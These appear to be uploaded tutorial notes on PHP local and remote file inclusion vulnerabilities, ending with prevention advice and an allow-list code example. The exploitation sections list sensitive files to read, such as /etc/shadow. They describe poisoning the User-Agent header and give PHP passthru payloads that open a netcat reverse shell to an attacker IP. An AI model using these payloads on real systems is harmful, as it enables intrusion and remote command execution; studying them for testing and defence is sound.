
File Inclusion

File Inclusion vulnerabilities allow attackers to include files in an application due to improper sanitization, with two main types being Local File Inclusion (LFI) and Remote File Inclusion (RFI). Exploitation methods involve including malicious scripts to gain unauthorized access or execute commands remotely. Prevention techniques include proper parameter sanitization and disabling certain PHP configurations to mitigate risks.

Uploaded by

John Wick

File Inclusion Vuln:
=================
A file inclusion vulnerability allows an attacker to include a file, usually
by exploiting a “dynamic file inclusion” mechanism implemented in the target
application, when proper sanitization is not done.

When we test for Local File Inclusion or Remote File Inclusion vulnerabilities, we
should be looking for scripts that take filenames as parameters, such as ‘file,
page, URL, path, filename’ etc.

Types of File inclusion vuln:


1. Local File Inclusion
2. Remote file inclusion

LFI: This happens when the parameter that names the file to include is not
properly sanitized.
So we can browse files on the remote target server. Some important files that can be
accessed are:
– /etc/issue
– /proc/version
– /proc/self/environ
– /etc/profile
– /etc/passwd
– /etc/shadow
– /root/.bash_history
– /var/log/dmessage
– /var/mail/root
– /var/spool/cron/crontabs/root

Exploitation:
-----------------
--> We can try to insert our own malicious PHP script into a log file and try to
get a remote reverse connection.
Ex: /proc/self/environ
--> We capture this request in Burp Suite.
--> One of the request headers that also appears in the environ file is User-Agent.
--> Example script to execute: <?php phpinfo(); ?>

To get reverse connection:


In Kali, open a listening port: nc -l -v <port>
The passthru function executes an external command on the server and passes the raw output back.
In the request, give the parameter value as: <?php passthru("nc -e /bin/sh IP PORT"); ?>

RFI: This happens when the target server has PHP configuration directives enabled
such as: i. allow_url_fopen ii. allow_url_include

Exploitation:
------------------
--> To check these settings we have to find the PHP configuration file (php.ini).
Its location is shown on the phpinfo page.
--> Open the file and check the settings.
--> Restart the Apache server if any changes were made: /etc/init.d/apache2 restart
--> Now create a malicious PHP code file:

<?php
passthru("nc -e /bin/sh IP PORT");
?>
--> Save it as a text file on the Kali web server. Do not save it as PHP,
or it will automatically execute on the Kali machine itself.
--> Now go to the target website and give the link to the text file with a question
mark at the end. Before that, start listening on the Kali machine.

If these are enabled hackers can include any file of their choice and execute them
remotely.

Prevention techniques:
1. Sanitize the parameter properly to see to it that only the local pages which are
required are included.
2. Disable allow_url_include and allow_url_fopen.
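
One way to implement prevention technique 1, as an added example that is not part of the original notes: the request value is only used as a key into an allow-list, so it never becomes part of the include path. The page names, the "page" parameter and the pages/ directory are assumptions.

```php
<?php
// Added example, not from the original notes. The page names, the "page"
// parameter and the pages/ directory are assumptions for illustration.

// Vulnerable pattern the notes describe: the parameter goes straight to include.
//   include $_GET['page'];

// Allow-list: request value => file that may be included.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a request value to an includable file, or null if it is not allowed.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and unknown keys are rejected. Traversal strings,
    // absolute paths and http:// URLs are never keys, so they fail here.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir
    // (catches a symlink or a mistaken allow-list entry).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

For technique 2, the matching php.ini lines are allow_url_include = Off and allow_url_fopen = Off.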

Resources:
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
https://www.php.net/manual/en/function.passthru.php
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
